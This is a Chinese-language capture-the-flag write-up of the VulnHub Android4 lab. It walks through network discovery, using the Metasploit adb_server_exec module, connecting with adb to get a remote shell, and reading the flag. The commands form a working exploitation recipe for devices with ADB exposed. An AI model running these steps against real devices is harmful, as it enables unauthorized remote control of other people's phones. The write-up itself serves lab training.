记一次对`vulnhub`中`Android4`靶机渗透测试全过程
字数 1131 2025-08-27 12:33:23
Android4 靶机渗透测试教学文档
靶机简介
- 名称: Android4
- 操作系统: Android v4.4
- 标志位置:
/data/root/ - 难度等级: 初学者
- 下载链接: Android4.ova
涉及知识点
- 端口扫描和IP发现
- 使用adb_server_exec攻击端口8080代理
- 使用ADB(Android Debug Bridge)连接到设备
- 使用Metasploit框架
- 特权升级和获取flag
详细渗透过程
1. 获取靶机IP地址
使用arp-scan工具扫描本地网络中的设备:
arp-scan -l
通过扫描结果确定靶机的IP地址(示例中为192.168.232.146)。
2. 扫描开放端口
使用Nmap进行全端口扫描和版本探测:
nmap -p- -A 192.168.232.146
扫描结果显示端口8080开放,可能运行着某种网页服务。
3. 初步探测
尝试访问http://192.168.232.146:8080,但未发现有用信息。
尝试以下方法均未成功:
- PHP CLI漏洞利用
- Dropbear RCE漏洞利用
4. 使用Android Debug Bridge (ADB)
安装ADB
如果系统未安装ADB,先进行安装:
sudo apt-get install adb
使用Metasploit启动ADB服务器
- 启动Metasploit框架:
msfconsole
- 使用adb_server_exec模块:
use exploit/android/adb/adb_server_exec
set RHOST 192.168.232.146
set LHOST [你的本地IP]
set LPORT 3333 # 修改默认端口以避免冲突
exploit
- 当显示"正在连接到设备"时,在新终端中连接ADB:
adb connect 192.168.232.146:5555
adb shell
5. 权限提升和获取flag
- 进入设备shell后,检查目录:
ls
- 进入/data目录:
cd /data
ls
- 发现root文件夹:
cd root
ls
- 查看flag文件:
cat flag.txt
关键工具和技术说明
Android Debug Bridge (ADB)
ADB是一个多功能命令行工具,用于与Android设备通信。它包含三个组件:
- 客户端:在开发计算机上运行,通过adb命令调用
- 守护程序(adbd):在设备上运行命令的后台进程
- 服务器:管理客户端和守护程序之间的通信
Metasploit的adb_server_exec模块
该模块利用ADB服务漏洞,允许攻击者通过开放的ADB端口执行任意命令。
搜索漏洞利用
可以使用searchsploit工具搜索已知漏洞:
searchsploit -w php cli
searchsploit dropbear
参考资料
总结
本渗透测试过程展示了如何通过ADB服务漏洞获取Android设备的控制权。关键步骤包括:
- 网络发现和端口扫描
- 识别开放的ADB服务
- 使用Metasploit利用漏洞
- 通过ADB连接获取shell访问
- 权限提升和获取flag
此过程适合初学者学习基本的Android设备渗透测试技术。